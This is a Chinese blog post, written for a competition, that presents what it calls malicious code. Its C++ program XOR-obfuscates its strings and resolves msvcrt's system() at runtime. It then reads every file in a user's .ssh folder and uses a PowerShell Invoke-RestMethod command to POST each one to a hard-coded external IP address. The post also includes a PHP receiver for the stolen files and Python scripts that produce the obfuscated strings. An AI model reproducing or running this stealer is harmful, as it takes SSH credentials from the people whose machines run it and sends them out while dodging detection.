【Windows C++】调用powershell上传指定目录下所有文件

版权声明:本文为博主原创文章,未经博主允许不得转载。 https://blog.csdn.net/think_ycx/article/details/81086159

上周写的一个恶意代码片段,功能为:
C++实现读取"C:\Users\thinkycx\.ssh\"目录下所有文件(不包括子文件夹),使用GetProcAddress从msvcrt.dll中获取system函数地址,动态调用system执行命令:powershell通过Invoke-RestMethod以HTTP POST方式把每个文件上传到服务端。

测试powershell功能用的上传命令,注意powershell代码中的\"代表转义的"。

powershell "Invoke-RestMethod -Uri \"http://45.32.66.143:8001/recvpost.php\" -Method Post -InFile \"C:\Users\thinkycx\.ssh\known_hosts\""

由于比赛的要求,对字符串做了简单的异或混淆。注意:单字节异或只能躲过最直接的字符串扫描,密钥只有256种可能,也可以用已知明文(比如开头的"powershell")直接恢复,并不是加密;另外上传走的是明文HTTP,流量里能直接看到文件内容。

服务端recvpost.php脚本:

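<?php
// Test receiver for the upload command above. Invoke-RestMethod -InFile sends
// the file contents as the raw POST body (no file name), and this script dumps
// that body to one fixed path. Note what it does NOT do: no authentication,
// plain HTTP, and "w" truncates, so every upload overwrites the previous one.
$input = file_get_contents("php://input");
if ($input === false) {
    die("Unable to read request body!");
}
echo $input;   // echoed back so the client can see what arrived (test aid only)
$myfile = fopen("/tmp/testfile.txt", "w") or die("Unable to open file!");
// fwrite() can fail or short-write; the original ignored its result.
if (fwrite($myfile, $input) !== strlen($input)) {
    fclose($myfile);
    die("Unable to write file!");
}
fclose($myfile);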

C++实现代码:

#include <iostream>
#include <dirent.h>
#include <string.h>
#include <stdio.h>
#include <stdlib.h>
#include <windows.h>

using namespace std;

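// XOR each of the first len bytes of buf with key, in place.
static void xor_decode(char *buf, size_t len, unsigned char key)
{
    for (size_t i = 0; i < len; i++) {
        buf[i] ^= (char)key;
    }
}

// Enumerate the (decoded) folder, and for each entry run the decoded
// PowerShell upload command through msvcrt!system, resolved at runtime.
// Returns 1 if msvcrt.dll/system cannot be resolved or the folder cannot be
// opened; the original silently carried on (and would have called a NULL
// function pointer).
int main()
{
    DIR *dir;
    struct dirent *ptr;
    // msvcrt!system is "int __cdecl system(const char *)". The original typedef
    // declared it WINAPI (__stdcall) returning void; on 32-bit builds that
    // mismatches who pops the arguments. Match the real prototype.
    typedef int (__cdecl *PGNSI)(const char *);

    //powershell "Invoke-RestMethod -Uri \"http://45.32.66.143:8001/recvpost.php\" -Method Post -InFile \"C:\Users\thinkycx\.ssh\known_hosts\""
    // Every literal below is XOR-obfuscated with its own single-byte key (the
    // key and plaintext are in the trailing comments); they are decoded in
    // place before use. A plaintext byte equal to its key would decode to 0x00
    // and truncate the string, so the keys were chosen to avoid that.
    char cmdline[0x100]="\x1d\x2\x1a\x8\x1f\x1e\x5\x8\x1\x1\x4d\x4f\x24\x3\x1b\x2\x6\x8\x40\x3f\x8\x1e\x19\x20\x8\x19\x5\x2\x9\x4d\x40\x38\x1f\x4\x4d\x31\x4f\x5\x19\x19\x1d\x57\x42\x42\x59\x58\x43\x5e\x5f\x43\x5b\x5b\x43\x5c\x59\x5e\x57\x55\x5d\x5d\x5c\x42\x1f\x8\xe\x1b\x1d\x2\x1e\x19\x43\x1d\x5\x1d\x31\x4f\x4d\x40\x20\x8\x19\x5\x2\x9\x4d\x3d\x2\x1e\x19\x4d\x40\x24\x3\x2b\x4\x1\x8\x4d\x31\x4f\x2e\x57\x31\x38\x1e\x8\x1f\x1e\x31\x19\x5\x4\x3\x6\x14\xe\x15\x31\x43\x1e\x1e\x5\x31";//"\x70\x6f\x77\x65\x72\x73\x68\x65\x6c\x6c\x20\x22\x49\x6e\x76\x6f\x6b\x65\x2d\x52\x65\x73\x74\x4d\x65\x74\x68\x6f\x64\x20\x2d\x55\x72\x69\x20\x5c\x22\x68\x74\x74\x70\x3a\x2f\x2f\x34\x35\x2e\x33\x32\x2e\x36\x36\x2e\x31\x34\x33\x3a\x38\x30\x30\x31\x2f\x72\x65\x63\x76\x70\x6f\x73\x74\x2e\x70\x68\x70\x5c\x22\x20\x2d\x4d\x65\x74\x68\x6f\x64\x20\x50\x6f\x73\x74\x20\x2d\x49\x6e\x46\x69\x6c\x65\x20\x5c\x22\x43\x3a\x5c\x55\x73\x65\x72\x73\x5c\x74\x68\x69\x6e\x6b\x79\x63\x78\x5c\x2e\x73\x73\x68\x5c";
    char cmdline_end[4] = "\x4d\x33\x33"; //0x11   \x5c\x22\x22";
    char foldername[100] = "\x50\x29\x3c\x46\x60\x76\x61\x60\x3c\x67\x7b\x7a\x7d\x78\x6a\x70\x6b\x3c\x3d\x60\x60\x7b\x3c"; // 0x13 "\x43\x3a\x2f\x55\x73\x65\x72\x73\x2f\x74\x68\x69\x6e\x6b\x79\x63\x78\x2f\x2e\x73\x73\x68\x2f";
    char msvcrtdll[11] = "\x2e\x30\x35\x20\x31\x37\x6d\x27\x2f\x2f"; //"msvcrt.dll";
    char funcname[7] = "\x64\x6e\x64\x63\x72\x7a"; //"system";
    char payload[0x200]={0};

    // Decode in place. The lengths are the byte counts of the encoded literals;
    // cmdline has no NUL bytes in its encoded form, so strlen() is its length.
    xor_decode(cmdline, strlen(cmdline), 0x6d);
    xor_decode(cmdline_end, 3, 0x11);
    xor_decode(funcname, 6, 0x17);
    xor_decode(msvcrtdll, 10, 0x43);
    xor_decode(foldername, 23, 0x13);

    // The module name is a char buffer, so call the ANSI entry point directly:
    // TEXT() on a non-literal only compiles in non-UNICODE builds.
    HMODULE msvcrt = GetModuleHandleA(msvcrtdll);
    if (msvcrt == NULL) {
        return 1;
    }
    PGNSI pGNSI = (PGNSI)GetProcAddress(msvcrt, funcname);
    if (pGNSI == NULL) {
        return 1;
    }

    dir = opendir(foldername);
    if (dir == NULL) {
        return 1;
    }
    while ((ptr = readdir(dir)) != NULL) {
        // readdir() also yields subdirectory names; those reach -InFile too
        // (presumably rejected on the PowerShell side) — only "." and ".." are
        // filtered here, as in the original.
        if (!strcmp(ptr->d_name, ".") || !strcmp(ptr->d_name, "..")) {
            continue;
        }
        // The entry name is spliced into a cmd.exe + PowerShell command line
        // with no escaping; a name containing a double quote breaks out of the
        // -InFile argument and changes the command. Skip such names rather than
        // run a mangled command (other shell metacharacters are still not
        // handled — the only robust fix is to not go through a shell at all).
        if (strchr(ptr->d_name, '"') != NULL) {
            continue;
        }
        // Bounded build of the command; the original sprintf() had no limit.
        int n = snprintf(payload, sizeof payload, "%s%s%s", cmdline, ptr->d_name, cmdline_end);
        if (n < 0 || (size_t)n >= sizeof payload) {
            continue;   // would not fit: skip instead of running a truncated command
        }
        pGNSI(payload);   // system() return value is not checked, as before
    }
    closedir(dir);   // the original leaked the DIR handle

    return 0;
}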

补充一下字符串转换脚本
字符串转化成"\xAB\xCD"形式:

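#!/usr/bin/env python
# coding=utf-8
# Render a string as a "\xAB\xCD" C escape sequence, one two-digit escape per byte.


def to_hex_escapes(text):
    """Return text as "\\x.." escapes, one per character.

    %02x zero-pads, so a byte below 0x10 comes out as "\\x08" — the original
    "%2x" space-padded it to "\\x 8", which is not a valid C escape.
    """
    return ''.join("\\x%02x" % ord(ch) for ch in text)


# Only the last assignment to `a` is converted; the earlier one is left as an
# alternative input to swap in.
a = r'powershell "Invoke-RestMethod -Uri \"http://45.32.66.143:8001/recvpost.php\" -Method Post -InFile \"C:\Users\thinkycx\.ssh\\'
a = r'C:/Users/thinkycx/.ssh/';
print(to_hex_escapes(a))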

"\xAB\xCD"和key异或一下输出:

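#!/usr/bin/env python
# coding=utf-8
# XOR a plaintext with a single-byte key and print it as "\xAB\xCD" C escapes.


def xor_escape(text, key):
    """Return text XORed byte-wise with key, rendered as two-digit "\\x.." escapes.

    Raises ValueError if some character equals the key: it would encode to
    0x00, and the decoded C string would be cut short at that point. (The
    original "%x" also emitted one-digit escapes such as "\\x8"; they only
    work because the next character is always a backslash.)
    """
    out = []
    for ch in text:
        c = ord(ch) ^ key
        if c == 0:
            raise ValueError("%r equals the key and would encode to NUL" % ch)
        out.append("\\x%02x" % c)
    return ''.join(out)


# Each literal in the C++ code uses its own key: cmdline_end 0x11, foldername
# 0x13, msvcrtdll 0x43, funcname 0x17, cmdline 0x6d. Only the last assignment
# to `a` is encoded; the others are left as inputs to swap in (change the key
# to match).
a = "\x5c\x22\x22"
a = "\x43\x3a\x2f\x55\x73\x65\x72\x73\x2f\x74\x68\x69\x6e\x6b\x79\x63\x78\x2f\x2e\x73\x73\x68\x2f"
a = "msvcrt.dll"
a = "system";
a = "\x70\x6f\x77\x65\x72\x73\x68\x65\x6c\x6c\x20\x22\x49\x6e\x76\x6f\x6b\x65\x2d\x52\x65\x73\x74\x4d\x65\x74\x68\x6f\x64\x20\x2d\x55\x72\x69\x20\x5c\x22\x68\x74\x74\x70\x3a\x2f\x2f\x34\x35\x2e\x33\x32\x2e\x36\x36\x2e\x31\x34\x33\x3a\x38\x30\x30\x31\x2f\x72\x65\x63\x76\x70\x6f\x73\x74\x2e\x70\x68\x70\x5c\x22\x20\x2d\x4d\x65\x74\x68\x6f\x64\x20\x50\x6f\x73\x74\x20\x2d\x49\x6e\x46\x69\x6c\x65\x20\x5c\x22\x43\x3a\x5c\x55\x73\x65\x72\x73\x5c\x74\x68\x69\x6e\x6b\x79\x63\x78\x5c\x2e\x73\x73\x68\x5c"

print(len(a))
print(xor_escape(a, 0x6d))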

